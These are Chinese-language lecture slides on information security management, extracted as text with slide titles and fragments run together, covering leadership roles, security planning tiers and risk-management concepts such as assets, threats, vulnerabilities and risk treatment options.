例三：局域网内计算机故障频繁发生例四：为什么要给每个用户管理员权限先来分析两个例子例一：先来分析两个例子152信息安全的成败取决于两个因素：技术和管理。技术是信息安全的构筑材料，管理是真正的粘合剂和催化剂。人们常说，三分技术，七分管理，可见管理对信息安全的重要性。信息安全管理（InformationSecurityManagement）作为组织完整的管理体系中一个重要的环节，它构成了信息安全具有能动性的部分，是指导和控制组织的关于信息安全风险的相互协调的活动，其针对对象就是组织的信息资产。现实世界里大多数安全事件的发生和安全隐患的存在，与其说是技术上的原因，不如说是管理不善造成的，理解并重视管理对于信息安全的关键作用，对于真正实现信息安全目标来说尤其重要。什么是信息安全管理？信息安全的成败取决于两个因素：技术和管理。什么是信息安153

根据风险评估结果、法律法规要求、组织业务运作自身需要来确定控制目标与控制措施。

实施所选的安全控制措施。

针对检查结果采取应对措施，改进安全状况。

依据策略、程序、标准和法律法规，对安全措施的实施情况进行符合性检查。信息安全管理模型根据风险评估结果、法律法规要求、组织业务运作自154信息安全必须从整体考虑，必须做到“有计划有目标、发现问题、分析问题、采取措施解决问题、后续监督避免再现”这样全程管理的思路，这就要求建立的是一套完整的信息安全管理体系，这样的系统工程，只有处于组织最高管理者领导和支持之下，才可能成功最高管理层通过明确信息安全目标和方针为信息安全活动指引方向最高管理层能够为信息安全活动提供必要的资源支持最高管理层能够在重大问题上做出决策最高管理层可以协调组织不同单位不同环节的关系，提升促动力说到底，最高管理者是组织信息安全的最终责任人组织高管全面负责信息安全管理信息安全必须从整体考虑，必须做到“有计划有目标、发现问题155制定有效的安全管理计划，可以确保信息安全策略得到恰当执行进行有效安全管理的途径，应该是自上而下的（Top-Down）：最高管理层负责启动并定义组织的安全方针管理中层负责将安全策略充实成标准、基线、指南和程序，并监督执行业务经理或安全专家负责实施安全管理文件中的指定配置最终用户负责遵守组织所有的安全策略安全管理计划小组应该开发三类计划：战略计划（strategicplan）是长期计划（例如5年），相对稳定，定义了组织的目标和使命

战术计划（tacticalplan）是中期计划（例如1年），是对实现战略计划中既定目标的任务和进度的细节描述，例如雇用计划、预算计划、维护计划、系统开发计划等

操作计划（operationalplan）是短期的高度细化的计划，须经常更新（每月或每季度），例如培训计划、系统部署计划、产品设计计划等按计划行事制定有效的安全管理计划，可以确保信息安全策略得到恰当执行156数据收集者（DataCollector）对数据主体（DataSubject）：准确（Accuracy）、隐私（Privacy）；数据保管者（DataCustodian）对数据拥有者（DataOwner）：可用性（Availability）、完整性（Integrity）、保密性（Confidentiality）；数据用户（DataUsers）对拥有者/主体（Owner/Subject）：保密性（Confidentiality）和完整性；系统用户（SystemUsers）对系统拥有者（SystemOwner）：可用性（Availability）和软件完整性（SoftwareIntegrity）；系统管理者（SystemManager）对用户（Users），可用性（Integrity）、完整性（Integrity）；用户（Users）对其它用户（OtherUsers）：可用性（Availability）。重要角色和职责数据收集者（DataCollector）对数据主体（D157信息安全管风险管理信息安全管风险管理158风险

风险管理（RiskManagement）就是识别风险、评估风险、采取措施将风险减少到可接受水平，并维持这个风险水平的过程。风险管理是信息安全管理的核心内容。在信息安全领域，风险（Risk）就是指信息资产遭受损坏并给企业带来负面影响的潜在可能性。风险管理风险管理概述风险风险管理（RiskManagement）就是识159资产（Asset）——对组织具有价值的信息资产，包括计算机硬件、通信设施、数据库、文档信息、软件、信息服务和人员等，所有这些资产都需要妥善保护。威胁（Threat）——可能对资产或组织造成损害的某种安全事件发生的潜在原因，需要识别出威胁源（Threatsource）或威胁代理（Threatagent）。弱点（Vulnerability）——也被称作漏洞或脆弱性，即资产或资产组中存在的可被威胁利用的缺点，弱点一旦被利用，就可能对资产造成损害。风险（Risk）——特定威胁利用资产弱点给资产或资产组带来损害的潜在可能性。可能性（Likelihood）——对威胁发生几率（Probability）或频率（Frequency）的定性描述。影响（Impact）——后果（Consequence），意外事件发生给组织带来的直接或间接的损失或伤害。安全措施（Safeguard）——控制（control）或对策（countermeasure），即通过防范威胁、减少弱点、限制意外事件带来影响等途径来消减风险的机制、方法和措施。残留风险（ResidualRisk）——在实施安全措施之后仍然存在的风险。风险管理相关要素资产（Asset）——对组织具有价值的信息资产，包括160风险RISKRISKRISKRISK风险基本的风险采取措施后剩余的风险资产威胁弱点资产威胁弱点风险管理的目标风险RISKRISKRISKRISK风险基本的风险采取措施后161安全控制的成本安全事件造成的损失最小化的总成本低高高安全成本/损失所提供的安全水平关键是达成成本利益的平衡安全控制的成本安全事件造成的损失最小化的总成本低高高安全成本162识别并评价资产识别并评估威胁识别并评估弱点现有控制确认风险评价接受保持现有控制确定风险消减策略选择控制目标和控制方式实施选定的控制YesNo确认并评估残留风险定期评估风险评估风险消减风险接受及控制风险管理风险管理的一般过程识别并评价资产识别并评估威胁识别并评估弱点现有控制确认风险评163风险评估（RiskAssessment）是对信息资产及其价值、面临的威胁、存在的弱点，以及三者综合作用而带来风险的大小或水平的评估。作为风险管理的基础，风险评估是组织确定信息安全需求的一个重要途径，属于组织信息安全管理体系策划的过程。主要任务包括：识别构成风险的各种因素评估风险发生的可能性和造成的影响，并最终评价风险水平或大小确定组织承受风险的能力确定风险消减和控制的策略、目标和优先顺序推荐风险消减对策以供实施包括风险分析（RiskAnalysis）和风险评价（RiskEvaluation）两部分，但一般来说，风险评估和风险分析同义。什么是风险评估？风险评估（RiskAssessment）是对信息资产及164降低风险（ReduceRisk）——实施有效控制，将风险降低到可接受的程度，实际上就是力图减小威胁发生的可能性和带来的影响，包括：减少威胁：例如，实施恶意软件控制程序，减少信息系统受恶意软件攻击的机会减少弱点：例如，通过安全意识培训，强化职员的安全意识与安全操作能力降低影响：例如，制定灾难恢复计划和业务连续性计划，做好备份规避风险（AvoidRisk）——或者RejectingRisk。有时候，组织可以选择放弃某些可能引来风险的业务或资产，以此规避风险。例如，将重要的计算机系统与互联网隔离，使其免遭来自外部网络的攻击。转嫁风险（TransferRisk）——也称作RiskAssignment。将风险全部或者部分地转移到其他责任方，例如购买商业保险。接受风险（AcceptRisk）——在实施了其他风险应对措施之后，对于残留的风险，组织可以选择接受。确定风险消减策略降低风险（ReduceR